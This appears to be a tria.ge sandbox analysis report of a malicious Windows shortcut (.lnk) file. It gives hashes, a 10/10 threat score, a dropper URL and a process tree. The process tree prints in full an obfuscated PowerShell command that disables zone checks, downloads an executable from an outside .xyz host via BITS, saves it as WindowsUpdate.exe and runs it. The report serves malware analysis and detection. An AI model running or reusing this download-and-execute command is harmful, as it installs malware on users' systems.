Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    10/04/2024, 14:59

General

  • Target

    f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166.lnk

  • Size

    1KB

  • MD5

    efcff826fa14c23c9abcd53e0a148383

  • SHA1

    f79f22761707f666178f8855fcfb95a46065dd21

  • SHA256

    f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166

  • SHA512

    c27f5edcd4b12500af5a7a46541bd0e6fda71bcce954e8a40138fe812adca4fb0fb46d442c3d420dfcba0937484a1ad106fb3aa94c04a2c15727d1f0a0fb45a5

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://001000100.xyz/soft/upd03212.exe

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3024
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" && C:\Windows\System32\cmd.exe /c poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://001'+'000'+'100.x'+'yz'+'/so'+'ft'+'/upd'+'03'+'212.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2792
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://001'+'000'+'100.x'+'yz'+'/so'+'ft'+'/upd'+'03'+'212.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1152

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1152-40-0x000000001B610000-0x000000001B8F2000-memory.dmp

    Filesize

    2.9MB

  • memory/1152-41-0x00000000022D0000-0x00000000022D8000-memory.dmp

    Filesize

    32KB

  • memory/1152-42-0x000007FEF5590000-0x000007FEF5F2D000-memory.dmp

    Filesize

    9.6MB

  • memory/1152-43-0x00000000028C0000-0x0000000002940000-memory.dmp

    Filesize

    512KB

  • memory/1152-44-0x000000001B4D0000-0x000000001B4F2000-memory.dmp

    Filesize

    136KB

  • memory/1152-45-0x000007FEF5590000-0x000007FEF5F2D000-memory.dmp

    Filesize

    9.6MB

  • memory/1152-46-0x00000000028C0000-0x0000000002940000-memory.dmp

    Filesize

    512KB

  • memory/1152-47-0x00000000028C0000-0x0000000002940000-memory.dmp

    Filesize

    512KB

  • memory/1152-48-0x0000000002DD0000-0x0000000002DE2000-memory.dmp

    Filesize

    72KB

  • memory/1152-49-0x000007FEF5590000-0x000007FEF5F2D000-memory.dmp

    Filesize

    9.6MB